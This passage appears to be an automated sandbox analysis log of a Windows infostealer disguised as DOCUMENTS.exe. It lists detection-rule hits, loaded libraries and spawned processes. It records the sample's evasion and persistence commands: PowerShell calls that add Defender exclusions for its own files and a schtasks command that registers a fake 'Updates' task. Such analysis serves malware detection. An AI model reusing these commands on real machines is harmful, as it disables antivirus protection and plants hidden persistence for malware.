                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeCode function: 14_2_05107F1014_2_05107F10
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeCode function: 14_2_0510000714_2_05100007
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeCode function: 14_2_0510004014_2_05100040
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeCode function: 14_2_05107F0314_2_05107F03
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeCode function: 14_2_0714965014_2_07149650
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeCode function: 14_2_071413C014_2_071413C0
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeCode function: 14_2_071410B814_2_071410B8
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeCode function: 14_2_0714C73014_2_0714C730
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeCode function: 14_2_0714963F14_2_0714963F
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeCode function: 14_2_0714067914_2_07140679
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeCode function: 14_2_0714068814_2_07140688
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeCode function: 14_2_0714043014_2_07140430
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeCode function: 14_2_0714044014_2_07140440
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeCode function: 14_2_0714E27014_2_0714E270
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeCode function: 14_2_0714C2F814_2_0714C2F8
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeCode function: 14_2_071410A814_2_071410A8
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeCode function: 14_2_071400C014_2_071400C0
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeCode function: 14_2_0714EB4814_2_0714EB48
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeCode function: 14_2_0714CB6814_2_0714CB68
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeCode function: 14_2_0714395F14_2_0714395F
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeCode function: 14_2_0714399814_2_07143998
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeCode function: 14_2_0714398814_2_07143988
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 18_2_010A937818_2_010A9378
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 18_2_010A9B3018_2_010A9B30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 18_2_010A4A9818_2_010A4A98
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 18_2_010ACFA018_2_010ACFA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 18_2_010A3E8018_2_010A3E80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 18_2_010A41C818_2_010A41C8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 18_2_05F7DDE018_2_05F7DDE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 18_2_05F78DCD18_2_05F78DCD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 18_2_05F7BCF818_2_05F7BCF8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 18_2_05F73F4818_2_05F73F48
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 18_2_05F756D018_2_05F756D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 18_2_05F7004018_2_05F70040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 18_2_05F72AF018_2_05F72AF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 18_2_05F79AD818_2_05F79AD8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 18_2_05F74FF018_2_05F74FF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 18_2_05F7324818_2_05F73248
                      Source: DOCUMENTS.exe, 00000001.00000002.1359470128.000000000471E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs DOCUMENTS.exe
                      Source: DOCUMENTS.exe, 00000001.00000002.1357702369.0000000002D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs DOCUMENTS.exe
                      Source: DOCUMENTS.exe, 00000001.00000002.1355341086.0000000000DFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs DOCUMENTS.exe
                      Source: DOCUMENTS.exe, 00000001.00000002.1362445020.0000000006F20000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs DOCUMENTS.exe
                      Source: DOCUMENTS.exe, 00000001.00000002.1363499261.000000000B0F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs DOCUMENTS.exe
                      Source: DOCUMENTS.exe, 00000001.00000002.1357702369.0000000003040000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename5f802f13-29d4-4509-bfb2-5fd9776e9980.exe4 vs DOCUMENTS.exe
                      Source: DOCUMENTS.exe, 00000001.00000002.1359470128.0000000004A7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename5f802f13-29d4-4509-bfb2-5fd9776e9980.exe4 vs DOCUMENTS.exe
                      Source: DOCUMENTS.exeBinary or memory string: OriginalFilenameerOG.exe6 vs DOCUMENTS.exe
                      Source: DOCUMENTS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 1.2.DOCUMENTS.exe.4ab9de8.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 14.2.bgURAojpNNIb.exe.3bd6948.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 1.2.DOCUMENTS.exe.4a7f3c8.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 14.2.bgURAojpNNIb.exe.3b9bf28.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 14.2.bgURAojpNNIb.exe.3bd6948.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 1.2.DOCUMENTS.exe.4ab9de8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 14.2.bgURAojpNNIb.exe.3b9bf28.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 1.2.DOCUMENTS.exe.4a7f3c8.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: DOCUMENTS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: bgURAojpNNIb.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 1.2.DOCUMENTS.exe.4ab9de8.1.raw.unpack, ekKu0.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 1.2.DOCUMENTS.exe.4ab9de8.1.raw.unpack, vKf1z6NvS.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 1.2.DOCUMENTS.exe.4ab9de8.1.raw.unpack, ZNAvlD7qmXc.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                      Source: 1.2.DOCUMENTS.exe.4ab9de8.1.raw.unpack, U2doU2.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 1.2.DOCUMENTS.exe.4ab9de8.1.raw.unpack, BgffYko.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 1.2.DOCUMENTS.exe.4ab9de8.1.raw.unpack, HrTdA63.csCryptographic APIs: 'CreateDecryptor'
                      Source: 1.2.DOCUMENTS.exe.4ab9de8.1.raw.unpack, Vvp22TrBv9g.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 1.2.DOCUMENTS.exe.4ab9de8.1.raw.unpack, Vvp22TrBv9g.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 1.2.DOCUMENTS.exe.4ab9de8.1.raw.unpack, Vvp22TrBv9g.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 1.2.DOCUMENTS.exe.4ab9de8.1.raw.unpack, Vvp22TrBv9g.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 1.2.DOCUMENTS.exe.b0f0000.8.raw.unpack, oDEPGtaZ6ry5IcnYBf.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 1.2.DOCUMENTS.exe.4925dc0.4.raw.unpack, oDEPGtaZ6ry5IcnYBf.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 1.2.DOCUMENTS.exe.4925dc0.4.raw.unpack, IjXwZhEmRlUu1fW5B2.csSecurity API names: _0020.SetAccessControl
                      Source: 1.2.DOCUMENTS.exe.4925dc0.4.raw.unpack, IjXwZhEmRlUu1fW5B2.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 1.2.DOCUMENTS.exe.4925dc0.4.raw.unpack, IjXwZhEmRlUu1fW5B2.csSecurity API names: _0020.AddAccessRule
                      Source: 1.2.DOCUMENTS.exe.b0f0000.8.raw.unpack, IjXwZhEmRlUu1fW5B2.csSecurity API names: _0020.SetAccessControl
                      Source: 1.2.DOCUMENTS.exe.b0f0000.8.raw.unpack, IjXwZhEmRlUu1fW5B2.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 1.2.DOCUMENTS.exe.b0f0000.8.raw.unpack, IjXwZhEmRlUu1fW5B2.csSecurity API names: _0020.AddAccessRule
                      Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, IjXwZhEmRlUu1fW5B2.csSecurity API names: _0020.SetAccessControl
                      Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, IjXwZhEmRlUu1fW5B2.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, IjXwZhEmRlUu1fW5B2.csSecurity API names: _0020.AddAccessRule
                      Source: 1.2.DOCUMENTS.exe.49a23e0.3.raw.unpack, oDEPGtaZ6ry5IcnYBf.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@21/15@1/1
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeFile created: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeMutant created: \Sessions\1\BaseNamedObjects\BgVdziomRLhuPfWnKtoTxhmOv
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1132:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7868:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7936:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7776:120:WilError_03
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeFile created: C:\Users\user\AppData\Local\Temp\tmp1DED.tmpJump to behavior
                      Source: DOCUMENTS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: DOCUMENTS.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: DOCUMENTS.exeReversingLabs: Detection: 44%
                      Source: DOCUMENTS.exeVirustotal: Detection: 35%
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeFile read: C:\Users\user\Desktop\DOCUMENTS.exe:Zone.IdentifierJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\DOCUMENTS.exe "C:\Users\user\Desktop\DOCUMENTS.exe"
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DOCUMENTS.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bgURAojpNNIb" /XML "C:\Users\user\AppData\Local\Temp\tmp1DED.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bgURAojpNNIb" /XML "C:\Users\user\AppData\Local\Temp\tmp35EA.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DOCUMENTS.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bgURAojpNNIb" /XML "C:\Users\user\AppData\Local\Temp\tmp1DED.tmp"Jump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bgURAojpNNIb" /XML "C:\Users\user\AppData\Local\Temp\tmp35EA.tmp"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
